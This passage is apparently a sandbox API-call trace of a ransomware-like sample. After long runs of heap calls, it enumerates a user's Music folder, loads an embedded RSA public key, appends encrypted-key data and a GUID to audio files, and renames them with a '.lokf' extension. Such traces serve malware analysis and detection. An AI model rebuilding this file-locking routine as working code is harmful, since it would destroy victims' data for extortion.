hHeap=0x660000) returned 1 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.477] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.477] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.479] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.479] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\") returned="iCD5MmspTIMUES\\" [0060.479] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.480] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.480] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\") returned="m4--j\\" [0060.480] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0060.480] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0060.480] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89448 [0060.480] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.480] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0060.480] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.480] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.480] PathFindFileNameW (pszPath="") returned="" [0060.480] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.480] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66899650, ftCreationTime.dwHighDateTime=0x1d4c80d, ftLastAccessTime.dwLowDateTime=0x94658a70, ftLastAccessTime.dwHighDateTime=0x1d4d3de, ftLastWriteTime.dwLowDateTime=0x94658a70, ftLastWriteTime.dwHighDateTime=0x1d4d3de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.480] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66899650, ftCreationTime.dwHighDateTime=0x1d4c80d, ftLastAccessTime.dwLowDateTime=0x94658a70, ftLastAccessTime.dwHighDateTime=0x1d4d3de, ftLastWriteTime.dwLowDateTime=0x94658a70, ftLastWriteTime.dwHighDateTime=0x1d4d3de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.480] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25e34560, ftCreationTime.dwHighDateTime=0x1d4d14f, ftLastAccessTime.dwLowDateTime=0xd643e690, ftLastAccessTime.dwHighDateTime=0x1d4cae6, ftLastWriteTime.dwLowDateTime=0xd643e690, ftLastWriteTime.dwHighDateTime=0x1d4cae6, nFileSizeHigh=0x0, nFileSizeLow=0x15336, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1fE6ecc0BbC6tSRJo26.mp3", cAlternateFileName="1FE6EC~1.MP3")) returned 1 [0060.480] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.480] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.480] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\1fE6ecc0BbC6tSRJo26.mp3") returned=".mp3" [0060.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\1fE6ecc0BbC6tSRJo26.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\1fe6ecc0bbc6tsrjo26.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.480] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=86838) returned 1 [0060.480] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.483] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15310, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.483] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.484] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.484] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x15336, lpOverlapped=0x0) returned 1 [0060.484] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.484] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.484] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.484] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.484] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8698) returned 1 [0060.485] CryptCreateHash (in: hProv=0x6b8698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.485] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.485] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.485] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.485] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.485] GetLastError () returned 0x0 [0060.485] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.485] CryptReleaseContext (hProv=0x6b8698, dwFlags=0x0) returned 1 [0060.485] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.485] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.485] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.485] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.486] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.486] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.486] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15336, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.486] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.486] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.487] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.487] CloseHandle (hObject=0x5cc) returned 1 [0060.488] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.488] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.488] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290398 | out: hHeap=0x660000) returned 1 [0060.488] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\1fE6ecc0BbC6tSRJo26.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\1fe6ecc0bbc6tsrjo26.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\1fE6ecc0BbC6tSRJo26.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\1fe6ecc0bbc6tsrjo26.mp3.lokf")) returned 1 [0060.488] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.488] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.488] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.489] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.489] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c198ec0, ftCreationTime.dwHighDateTime=0x1d4d123, ftLastAccessTime.dwLowDateTime=0x1bce21f0, ftLastAccessTime.dwHighDateTime=0x1d4d59e, ftLastWriteTime.dwLowDateTime=0x1bce21f0, ftLastWriteTime.dwHighDateTime=0x1d4d59e, nFileSizeHigh=0x0, nFileSizeLow=0x14c85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ApuXtGetFJ4Lr9.wav", cAlternateFileName="APUXTG~1.WAV")) returned 1 [0060.489] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.489] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.490] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.490] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ApuXtGetFJ4Lr9.wav") returned=".wav" [0060.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ApuXtGetFJ4Lr9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\apuxtgetfj4lr9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.490] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=85125) returned 1 [0060.490] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.492] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14c5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.492] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.493] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.493] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.493] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.493] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x14c85, lpOverlapped=0x0) returned 1 [0060.493] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.493] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.494] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.494] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 